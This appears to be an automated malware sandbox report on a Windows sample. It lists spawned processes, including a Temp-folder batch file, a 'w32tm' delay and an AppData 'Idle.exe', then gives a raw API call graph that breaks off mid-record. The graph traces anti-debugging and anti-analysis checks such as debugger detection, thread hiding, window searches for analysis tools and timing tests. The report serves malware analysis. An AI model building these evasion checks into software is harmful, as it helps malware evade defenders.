                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                                            Start time:14:24:52
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                                            Start time:14:24:52
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                                                                            Imagebase:0x7ff6b9840000
                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:53
                                                                                                                                                                                                            Start time:14:24:52
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\w32tm.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                                                            Imagebase:0x7ff67ab10000
                                                                                                                                                                                                            File size:108'032 bytes
                                                                                                                                                                                                            MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:54
                                                                                                                                                                                                            Start time:14:24:52
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Idle.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Idle.exe"
                                                                                                                                                                                                            Imagebase:0x1a0000
                                                                                                                                                                                                            File size:1'963'008 bytes
                                                                                                                                                                                                            MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:55
                                                                                                                                                                                                            Start time:14:24:55
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AntDRUzUoe.bat" "
                                                                                                                                                                                                            Imagebase:0x7ff782790000
                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:56
                                                                                                                                                                                                            Start time:14:24:55
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:57
                                                                                                                                                                                                            Start time:14:24:55
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                                                                            Imagebase:0x7ff6b9840000
                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:132
                                                                                                                                                                                                            Start time:14:26:04
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:1.7%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:28.9%
                                                                                                                                                                                                              Total number of Nodes:598
                                                                                                                                                                                                              Total number of Limit Nodes:12
                                                                                                                                                                                                              execution_graph 15750 7ff735da1000 GetSystemMetrics 17717 7ff735dd1200 17720 7ff735da13d0 17717->17720 17719 7ff735dd1227 __stdio_common_vsprintf 17720->17719 16322 7ff735dc7adb 16347 7ff735dcf040 16322->16347 16324 7ff735dc7b1d 16363 7ff735dbe510 16324->16363 16331 7ff735dc7d35 16332 7ff735dc7d40 16331->16332 16333 7ff735dc7d6b 16331->16333 16337 7ff735dc7d64 16332->16337 16405 7ff735da2470 16332->16405 16335 7ff735da2470 __stdio_common_vsprintf 16333->16335 16333->16337 16335->16337 16338 7ff735dc7f2a 16337->16338 16409 7ff735da33a0 16337->16409 16340 7ff735dc7f65 16338->16340 16413 7ff735da2e50 16338->16413 16342 7ff735dea920 8 API calls 16340->16342 16344 7ff735dc7fe1 16342->16344 16343 7ff735dc7eb0 memchr 16345 7ff735dc7e19 16343->16345 16345->16338 16345->16343 16346 7ff735db1f40 6 API calls 16345->16346 16346->16345 16348 7ff735dcf0d6 16347->16348 16349 7ff735dcf1fc pow 16348->16349 16355 7ff735dcf24c 16348->16355 16350 7ff735dcf210 pow 16349->16350 16350->16355 16351 7ff735dcf2da 16420 7ff735dd0d80 16351->16420 16354 7ff735dcf33b 16354->16324 16355->16351 16359 7ff735dd0d80 2 API calls 16355->16359 16362 7ff735dcf2cd 16355->16362 16356 7ff735dcf61f powf 16361 7ff735dcf5eb 16356->16361 16357 7ff735dcf5cc powf 16357->16361 16359->16362 16428 7ff735dd0670 16361->16428 16362->16351 16362->16356 16362->16357 16362->16361 16364 7ff735dbe51d 16363->16364 16371 7ff735dbe597 16363->16371 16365 7ff735dbe5a6 16364->16365 16366 7ff735dbe54b 16364->16366 16456 7ff735dbc350 16365->16456 16436 7ff735dbde80 16366->16436 16369 7ff735dbe558 16370 7ff735dbd470 18 API calls 16369->16370 16372 7ff735dbe571 16370->16372 16374 7ff735dbdcc0 16371->16374 16372->16371 16373 7ff735db3280 3 API calls 16372->16373 16373->16371 16375 7ff735dbdd45 16374->16375 16376 7ff735dbdcfc 16374->16376 16377 7ff735db3280 3 API calls 16375->16377 16376->16375 16378 7ff735dbdcfe 16376->16378 16382 7ff735dbdd69 16377->16382 16379 7ff735dbdd30 16378->16379 16381 7ff735db3280 3 API calls 16378->16381 16384 7ff735dbd470 16379->16384 16380 7ff735dbdda0 cosf sinf 16380->16382 16381->16379 16382->16379 16382->16380 16383 7ff735db3280 3 API calls 16382->16383 16383->16382 16385 7ff735dbd4f8 16384->16385 16396 7ff735dbd829 16384->16396 16387 7ff735dbd511 16385->16387 16388 7ff735dbda47 16385->16388 16386 7ff735dea920 8 API calls 16389 7ff735dbdaeb 16386->16389 16390 7ff735dbc350 6 API calls 16387->16390 16391 7ff735dbc350 6 API calls 16388->16391 16389->16331 16398 7ff735db3280 16389->16398 16394 7ff735dbd536 16390->16394 16391->16396 16392 7ff735dbd66b sqrtf 16392->16394 16393 7ff735dbd6e0 sqrtf 16393->16394 16394->16392 16394->16393 16395 7ff735dbd756 sqrtf 16394->16395 16394->16396 16397 7ff735dbd7cc sqrtf 16394->16397 16395->16394 16396->16386 16397->16394 16399 7ff735db32f5 16398->16399 16400 7ff735db3295 malloc 16398->16400 16399->16331 16400->16399 16402 7ff735db32c5 memmove 16400->16402 16403 7ff735db32ef free 16402->16403 16404 7ff735db32dd 16402->16404 16403->16399 16404->16403 16479 7ff735da13d0 16405->16479 16407 7ff735da2495 __stdio_common_vsprintf 16408 7ff735da24ca 16407->16408 16408->16337 16411 7ff735da33fb 16409->16411 16410 7ff735da36a3 16410->16345 16411->16410 16480 7ff735dc1a40 16411->16480 16414 7ff735da2e88 16413->16414 16415 7ff735dc1a40 8 API calls 16414->16415 16417 7ff735da30d8 16414->16417 16418 7ff735da2fbf 16414->16418 16415->16418 16416 7ff735da3062 memchr 16416->16418 16417->16340 16418->16416 16418->16417 16419 7ff735db1f40 6 API calls 16418->16419 16419->16418 16421 7ff735dd0d8c 16420->16421 16422 7ff735dd0d94 16420->16422 16421->16354 16423 7ff735dd0edf 16422->16423 16424 7ff735dd0e84 powf 16422->16424 16425 7ff735dd0e25 powf 16422->16425 16423->16354 16424->16354 16425->16354 16429 7ff735dd0691 16428->16429 16430 7ff735da2470 __stdio_common_vsprintf 16429->16430 16435 7ff735dd06f0 16429->16435 16432 7ff735dd06d0 16430->16432 16431 7ff735dea920 8 API calls 16433 7ff735dd0797 16431->16433 16434 7ff735dd0750 atof 16432->16434 16432->16435 16433->16351 16434->16435 16435->16431 16437 7ff735dbdecf 16436->16437 16439 7ff735dbe0ad 16437->16439 16447 7ff735dbdf4b 16437->16447 16438 7ff735dbe1b2 16440 7ff735dbe216 16438->16440 16446 7ff735db3280 3 API calls 16438->16446 16441 7ff735db3280 3 API calls 16439->16441 16442 7ff735dbe102 16439->16442 16440->16369 16441->16442 16443 7ff735db3280 3 API calls 16442->16443 16444 7ff735dbe164 16442->16444 16443->16444 16444->16438 16445 7ff735db3280 3 API calls 16444->16445 16445->16438 16446->16440 16461 7ff735dbdb40 16447->16461 16450 7ff735dbdb40 3 API calls 16451 7ff735dbe00b 16450->16451 16452 7ff735dbdb40 3 API calls 16451->16452 16453 7ff735dbe04e 16452->16453 16454 7ff735dbdb40 3 API calls 16453->16454 16455 7ff735dbe093 16454->16455 16455->16369 16470 7ff735dc2cd0 16456->16470 16458 7ff735dbc3d5 16458->16371 16459 7ff735dbc392 16459->16458 16460 7ff735db38c0 3 API calls 16459->16460 16460->16458 16462 7ff735dbdb71 16461->16462 16463 7ff735dbdb87 16462->16463 16466 7ff735dbdc48 16462->16466 16464 7ff735db3280 3 API calls 16463->16464 16468 7ff735dbdb9f 16464->16468 16465 7ff735dbdc46 16465->16450 16466->16465 16467 7ff735db3280 3 API calls 16466->16467 16467->16465 16468->16465 16469 7ff735db3280 3 API calls 16468->16469 16469->16468 16471 7ff735dc2daa 16470->16471 16472 7ff735dc2cea 16470->16472 16471->16459 16473 7ff735dc2d98 16472->16473 16474 7ff735dc2d29 malloc 16472->16474 16473->16459 16475 7ff735dc2d46 memmove 16474->16475 16476 7ff735dc2d7a 16474->16476 16477 7ff735dc2d62 16475->16477 16478 7ff735dc2d74 free 16475->16478 16476->16459 16477->16478 16478->16476 16479->16407 16485 7ff735dc1a91 16480->16485 16481 7ff735dc2076 16481->16410 16482 7ff735dc1c14 16482->16481 16484 7ff735dbc350 6 API calls 16482->16484 16483 7ff735dc1b88 memchr 16483->16485 16491 7ff735dc1c56 16484->16491 16485->16481 16485->16483 16486 7ff735dc1bbe 16485->16486 16486->16482 16487 7ff735dc1bea memchr 16486->16487 16487->16486 16488 7ff735dc2cd0 3 API calls 16489 7ff735dc2041 16488->16489 16489->16481 16490 7ff735db38c0 3 API calls 16489->16490 16490->16481 16491->16488 15751 7ff735dd4bf0 IsDebuggerPresent 15752 7ff735dd4ec3 GetCurrentProcess CheckRemoteDebuggerPresent 15751->15752 15757 7ff735dd4c2d 15751->15757 15753 7ff735dd5193 LoadLibraryA GetProcAddress GetCurrentProcess NtQueryInformationProcess 15752->15753 15756 7ff735dd4ee7 15752->15756 15754 7ff735dd54a3 memset GetCurrentThread GetThreadContext 15753->15754 15762 7ff735dd51e0 15753->15762 15755 7ff735dd56b6 15754->15755 15775 7ff735dd54d8 15754->15775 15843 7ff735dd4300 15755->15843 15760 7ff735de8990 7 API calls 15756->15760 15758 7ff735de8990 7 API calls 15757->15758 15761 7ff735dd4ea7 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15758->15761 15764 7ff735dd5177 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15760->15764 15761->15752 15762->15754 15767 7ff735de8990 7 API calls 15762->15767 15763 7ff735dd5886 GetCurrentProcess OpenProcessToken 15765 7ff735dd58a3 GetTokenInformation 15763->15765 15766 7ff735dd58f6 15763->15766 15764->15753 15769 7ff735dd58eb CloseHandle 15765->15769 15770 7ff735dd58c7 15765->15770 15880 7ff735dd4660 15766->15880 15771 7ff735dd5487 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15767->15771 15768 7ff735dd56bb 15768->15763 15776 7ff735dd581c 15768->15776 15779 7ff735de8990 7 API calls 15768->15779 15769->15766 15770->15769 15777 7ff735dd5ac6 CloseHandle 15770->15777 15771->15754 15775->15755 15831 7ff735de8990 15775->15831 15790 7ff735dd5ae2 15777->15790 15778 7ff735dd5c86 VirtualAlloc 15780 7ff735dd5ca4 memset 15778->15780 15781 7ff735dd5ce7 SetLastError GetLastError 15778->15781 15782 7ff735dd586a ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15779->15782 15783 7ff735dd5cc0 15780->15783 15809 7ff735dd5d02 15781->15809 15782->15763 15785 7ff735dd5ec6 VirtualFree 15783->15785 15789 7ff735dd5cd6 VirtualFree 15783->15789 15784 7ff735dd58fb 15784->15778 15786 7ff735dd5a9f 15784->15786 15791 7ff735dd5a5c 15784->15791 15803 7ff735dd5ee8 15785->15803 15788 7ff735de8990 7 API calls 15786->15788 15787 7ff735de8990 7 API calls 15795 7ff735dd5c6a ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15787->15795 15796 7ff735dd5aaa ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15788->15796 15789->15781 15790->15787 15792 7ff735dd6096 CreateToolhelp32Snapshot 15793 7ff735dd615d GetTickCount 15792->15793 15794 7ff735dd60b8 Thread32First 15792->15794 15799 7ff735dd6180 15793->15799 15797 7ff735dd6154 CloseHandle 15794->15797 15798 7ff735dd60d6 GetCurrentProcessId 15794->15798 15795->15778 15796->15777 15797->15793 15800 7ff735dd6142 Thread32Next 15798->15800 15801 7ff735dd60e2 GetCurrentThreadId 15798->15801 15799->15799 15802 7ff735dd6196 GetTickCount 15799->15802 15800->15797 15800->15798 15801->15800 15806 7ff735dd60f2 OpenThread 15801->15806 15819 7ff735dd61a7 15802->15819 15821 7ff735dd634d 15802->15821 15804 7ff735de8990 7 API calls 15803->15804 15808 7ff735dd607a ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15804->15808 15805 7ff735dd5e5c 15806->15800 15810 7ff735dd6107 LoadLibraryA GetProcAddress 15806->15810 15807 7ff735de8990 7 API calls 15811 7ff735dd5eaa ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15807->15811 15808->15792 15809->15792 15809->15805 15809->15807 15809->15809 15814 7ff735dd6139 CloseHandle 15810->15814 15815 7ff735dd6129 NtSetInformationThread 15810->15815 15811->15785 15812 7ff735dd6613 GetProcessHeap HeapSetInformation 15813 7ff735dd67f6 VirtualAlloc 15812->15813 15825 7ff735dd6635 15812->15825 15816 7ff735dd69bd 15813->15816 15830 7ff735dd6818 15813->15830 15814->15800 15815->15814 15889 7ff735dea920 15816->15889 15817 7ff735de8990 7 API calls 15820 7ff735dd6331 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15817->15820 15819->15817 15819->15819 15820->15821 15821->15812 15823 7ff735de8990 7 API calls 15821->15823 15824 7ff735dd65f7 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15823->15824 15824->15812 15826 7ff735de8990 7 API calls 15825->15826 15828 7ff735dd67da ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15826->15828 15827 7ff735de8990 7 API calls 15829 7ff735dd69a1 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15827->15829 15828->15813 15829->15816 15830->15827 15832 7ff735de89c0 15831->15832 15833 7ff735de8a20 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 15832->15833 15835 7ff735de8a0d 15832->15835 15833->15835 15836 7ff735de8a8d ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 15835->15836 15838 7ff735de8a65 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 15835->15838 15839 7ff735de8a44 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 15835->15839 15836->15839 15842 7ff735de8aaa 15836->15842 15837 7ff735de8b1d ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 15841 7ff735dd569a ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 15837->15841 15838->15835 15838->15839 15839->15837 15839->15841 15840 7ff735de8ab5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 15840->15839 15840->15842 15841->15755 15842->15839 15842->15840 15898 7ff735dde9c0 15843->15898 15845 7ff735dd4360 15846 7ff735dde9c0 9 API calls 15845->15846 15847 7ff735dd4386 15846->15847 15848 7ff735dde9c0 9 API calls 15847->15848 15849 7ff735dd43ac 15848->15849 15850 7ff735dde9c0 9 API calls 15849->15850 15851 7ff735dd43d2 15850->15851 15852 7ff735dde9c0 9 API calls 15851->15852 15853 7ff735dd43f8 15852->15853 15854 7ff735dde9c0 9 API calls 15853->15854 15855 7ff735dd441e 15854->15855 15856 7ff735dde9c0 9 API calls 15855->15856 15857 7ff735dd4447 15856->15857 15916 7ff735ddeac0 15857->15916 15859 7ff735dd44d7 15861 7ff735dde9c0 9 API calls 15859->15861 15860 7ff735dd4479 15860->15859 15863 7ff735dd44bd FindWindowA 15860->15863 15862 7ff735dd450f 15861->15862 15864 7ff735dde9c0 9 API calls 15862->15864 15863->15860 15865 7ff735dd4617 15863->15865 15866 7ff735dd4538 15864->15866 15937 7ff735de6700 15865->15937 15867 7ff735dde9c0 9 API calls 15866->15867 15869 7ff735dd4560 15867->15869 15871 7ff735dde9c0 9 API calls 15869->15871 15873 7ff735dd4586 15871->15873 15872 7ff735dea920 8 API calls 15874 7ff735dd4636 15872->15874 15875 7ff735ddeac0 20 API calls 15873->15875 15874->15768 15876 7ff735dd45b6 15875->15876 15877 7ff735dd4609 15876->15877 15878 7ff735dd45f3 FindWindowA 15876->15878 15879 7ff735de6700 2 API calls 15877->15879 15878->15876 15878->15877 15879->15865 15989 7ff735dec090 15880->15989 15883 7ff735dd46c0 15884 7ff735dd46d0 GetCurrentProcess K32GetModuleBaseNameA 15883->15884 15887 7ff735dd4700 _stricmp 15883->15887 15888 7ff735dd4730 15883->15888 15884->15883 15885 7ff735dea920 8 API calls 15886 7ff735dd4742 15885->15886 15886->15784 15887->15883 15887->15888 15888->15885 15890 7ff735dea929 15889->15890 15891 7ff735dd69d4 15890->15891 15892 7ff735deae1c IsProcessorFeaturePresent 15890->15892 15893 7ff735deae34 15892->15893 15991 7ff735deaef0 RtlCaptureContext 15893->15991 15899 7ff735dde9e6 15898->15899 15900 7ff735ddeab0 15898->15900 15901 7ff735dde9ec memmove 15899->15901 15902 7ff735ddea0b 15899->15902 15951 7ff735dd1400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 15900->15951 15901->15845 15904 7ff735ddeab5 15902->15904 15905 7ff735ddea5d 15902->15905 15907 7ff735ddea7c 15902->15907 15910 7ff735ddea1c 15902->15910 15952 7ff735dd1360 15904->15952 15906 7ff735ddea84 memmove 15905->15906 15906->15845 15911 7ff735deaf64 std::_Facet_Register 4 API calls 15907->15911 15941 7ff735deaf64 15910->15941 15914 7ff735ddea37 15911->15914 15913 7ff735ddeabb 15914->15906 15915 7ff735ddea75 _invalid_parameter_noinfo_noreturn 15915->15907 15918 7ff735ddeb0b 15916->15918 15929 7ff735ddebc8 15916->15929 15917 7ff735dea920 8 API calls 15919 7ff735ddebdc 15917->15919 15921 7ff735ddeb5c 15918->15921 15924 7ff735ddeb67 15918->15924 15926 7ff735ddebf1 15918->15926 15927 7ff735ddeb3d 15918->15927 15935 7ff735ddebf6 15918->15935 15919->15860 15928 7ff735deaf64 std::_Facet_Register 4 API calls 15921->15928 15923 7ff735ddebbd 15976 7ff735dded30 15923->15976 15924->15923 15959 7ff735ddec00 15924->15959 15931 7ff735dd1360 Concurrency::cancel_current_task __std_exception_copy 15926->15931 15930 7ff735deaf64 std::_Facet_Register 4 API calls 15927->15930 15932 7ff735ddeb47 15928->15932 15929->15917 15934 7ff735ddeb42 15930->15934 15931->15935 15932->15924 15934->15932 15936 7ff735ddeb55 _invalid_parameter_noinfo_noreturn 15934->15936 15984 7ff735de66e0 ?_Xlength_error@std@@YAXPEBD 15935->15984 15936->15921 15938 7ff735de6711 15937->15938 15939 7ff735dd4624 15937->15939 15940 7ff735dded30 2 API calls 15938->15940 15939->15872 15940->15939 15942 7ff735deaf7e malloc 15941->15942 15943 7ff735deaf6f 15942->15943 15944 7ff735ddea32 15942->15944 15943->15942 15945 7ff735deaf8e 15943->15945 15944->15914 15944->15915 15948 7ff735deaf99 15945->15948 15955 7ff735deb76c 15945->15955 15947 7ff735dd1360 Concurrency::cancel_current_task __std_exception_copy 15949 7ff735deaf9f free 15947->15949 15948->15947 15951->15904 15953 7ff735dd136e Concurrency::cancel_current_task 15952->15953 15954 7ff735dd137f __std_exception_copy 15953->15954 15954->15913 15958 7ff735deb74c 15955->15958 15957 7ff735deb77a _CxxThrowException 15958->15957 15960 7ff735ddec2e 15959->15960 15961 7ff735ddec44 15960->15961 15962 7ff735dded09 15960->15962 15963 7ff735ddec4a 15961->15963 15965 7ff735ddecde memmove 15961->15965 15966 7ff735dded0e 15961->15966 15969 7ff735ddecd9 15961->15969 15972 7ff735ddec7a 15961->15972 15985 7ff735dd1400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 15962->15985 15963->15924 15965->15924 15967 7ff735dd1360 Concurrency::cancel_current_task __std_exception_copy 15966->15967 15970 7ff735dded14 15967->15970 15968 7ff735deaf64 std::_Facet_Register 4 API calls 15971 7ff735ddec90 15968->15971 15973 7ff735deaf64 std::_Facet_Register 4 API calls 15969->15973 15974 7ff735ddecd2 _invalid_parameter_noinfo_noreturn 15971->15974 15975 7ff735ddec98 15971->15975 15972->15968 15973->15965 15974->15969 15975->15965 15977 7ff735dded9e 15976->15977 15978 7ff735dded35 15976->15978 15977->15929 15978->15977 15979 7ff735ddedae _invalid_parameter_noinfo_noreturn 15978->15979 15986 7ff735dead70 15978->15986 15981 7ff735ddedcc 15979->15981 15981->15929 15982 7ff735de675b 15981->15982 15983 7ff735dded30 free 15981->15983 15982->15929 15983->15982 15985->15966 15987 7ff735deafa0 free 15986->15987 15990 7ff735dd4670 GetCurrentProcess K32EnumProcessModules 15989->15990 15990->15883 15990->15888 15992 7ff735deaf0a RtlLookupFunctionEntry 15991->15992 15993 7ff735deaf20 RtlVirtualUnwind 15992->15993 15994 7ff735deae47 15992->15994 15993->15992 15993->15994 15995 7ff735deade8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15994->15995 16660 7ff735dd3ed0 16661 7ff735dd3f0a 16660->16661 16662 7ff735dd4096 16660->16662 16664 7ff735dbe510 21 API calls 16661->16664 16671 7ff735dd4089 16661->16671 16688 7ff735dbe830 16662->16688 16666 7ff735dd3ff4 16664->16666 16665 7ff735dd418a 16667 7ff735dbe900 23 API calls 16665->16667 16674 7ff735dbe900 16666->16674 16668 7ff735dd41e0 16667->16668 16669 7ff735dac6f0 41 API calls 16668->16669 16669->16671 16675 7ff735dbe995 16674->16675 16676 7ff735dbe90d 16674->16676 16682 7ff735dac6f0 16675->16682 16677 7ff735dbdcc0 5 API calls 16676->16677 16678 7ff735dbe956 16677->16678 16679 7ff735dbd470 18 API calls 16678->16679 16680 7ff735dbe96f 16679->16680 16680->16675 16681 7ff735db3280 3 API calls 16680->16681 16681->16675 16683 7ff735dac712 16682->16683 16685 7ff735dac717 16682->16685 16696 7ff735db19c0 16683->16696 16687 7ff735dac72a 16685->16687 16703 7ff735db2130 16685->16703 16687->16671 16689 7ff735dbe83d 16688->16689 16694 7ff735dbe8de 16688->16694 16690 7ff735dbdcc0 5 API calls 16689->16690 16691 7ff735dbe88e 16690->16691 16692 7ff735dbc550 20 API calls 16691->16692 16693 7ff735dbe8b8 16692->16693 16693->16694 16695 7ff735db3280 3 API calls 16693->16695 16694->16665 16695->16694 16697 7ff735db1a15 16696->16697 16713 7ff735dbc0d0 16697->16713 16700 7ff735db1a45 16702 7ff735db1d08 16700->16702 16722 7ff735dc42a0 16700->16722 16733 7ff735dbe250 16700->16733 16702->16685 16704 7ff735db21fa 16703->16704 16705 7ff735db214a 16703->16705 16704->16687 16771 7ff735db1f40 16705->16771 16707 7ff735db215b 16708 7ff735db2166 __acrt_iob_func 16707->16708 16711 7ff735db218b 16707->16711 16709 7ff735db2185 fclose 16708->16709 16710 7ff735db217d fflush 16708->16710 16709->16711 16710->16711 16711->16704 16712 7ff735db21ed free 16711->16712 16712->16704 16715 7ff735dbc0e6 16713->16715 16720 7ff735dbc29b 16713->16720 16714 7ff735dbc1ca 16716 7ff735dbc1fc 16714->16716 16718 7ff735db38c0 3 API calls 16714->16718 16715->16714 16717 7ff735db3820 3 API calls 16715->16717 16719 7ff735dbc251 memmove 16716->16719 16716->16720 16721 7ff735dbc273 memmove 16716->16721 16717->16714 16718->16716 16719->16716 16720->16700 16721->16716 16723 7ff735dc42e0 16722->16723 16724 7ff735dc4340 16722->16724 16723->16700 16726 7ff735dc447f 16724->16726 16743 7ff735dac7c0 16724->16743 16727 7ff735dc451c 16726->16727 16728 7ff735dc44bb 16726->16728 16729 7ff735dac7c0 2 API calls 16726->16729 16730 7ff735dac7c0 2 API calls 16727->16730 16731 7ff735dc4593 16727->16731 16728->16700 16729->16727 16730->16731 16731->16728 16749 7ff735da79a0 16731->16749 16734 7ff735dbe3ab 16733->16734 16738 7ff735dbe25d 16733->16738 16734->16700 16735 7ff735dbe2e7 16736 7ff735dbe34c 16735->16736 16739 7ff735db3280 3 API calls 16735->16739 16753 7ff735dbc550 16736->16753 16738->16735 16741 7ff735db3280 3 API calls 16738->16741 16739->16736 16741->16735 16742 7ff735db3280 3 API calls 16742->16734 16744 7ff735dac7df 16743->16744 16745 7ff735dac8c8 memmove 16744->16745 16746 7ff735dac8c6 16744->16746 16748 7ff735dac954 16744->16748 16745->16746 16747 7ff735dac95f memmove 16746->16747 16746->16748 16747->16748 16748->16726 16750 7ff735da79c3 16749->16750 16751 7ff735da79c5 16750->16751 16752 7ff735da7a1d fmodf 16750->16752 16751->16728 16752->16728 16754 7ff735dbc5dc 16753->16754 16767 7ff735dbca3e 16753->16767 16756 7ff735dbc629 16754->16756 16757 7ff735dbd1c8 16754->16757 16755 7ff735dea920 8 API calls 16758 7ff735dbd406 16755->16758 16760 7ff735dbc350 6 API calls 16756->16760 16759 7ff735dbc350 6 API calls 16757->16759 16758->16734 16758->16742 16761 7ff735dbd1dd 16759->16761 16764 7ff735dbc65f 16760->16764 16762 7ff735dbd26b sqrtf 16761->16762 16761->16767 16762->16761 16763 7ff735dbc961 16766 7ff735dbc9f4 sqrtf 16763->16766 16763->16767 16764->16763 16765 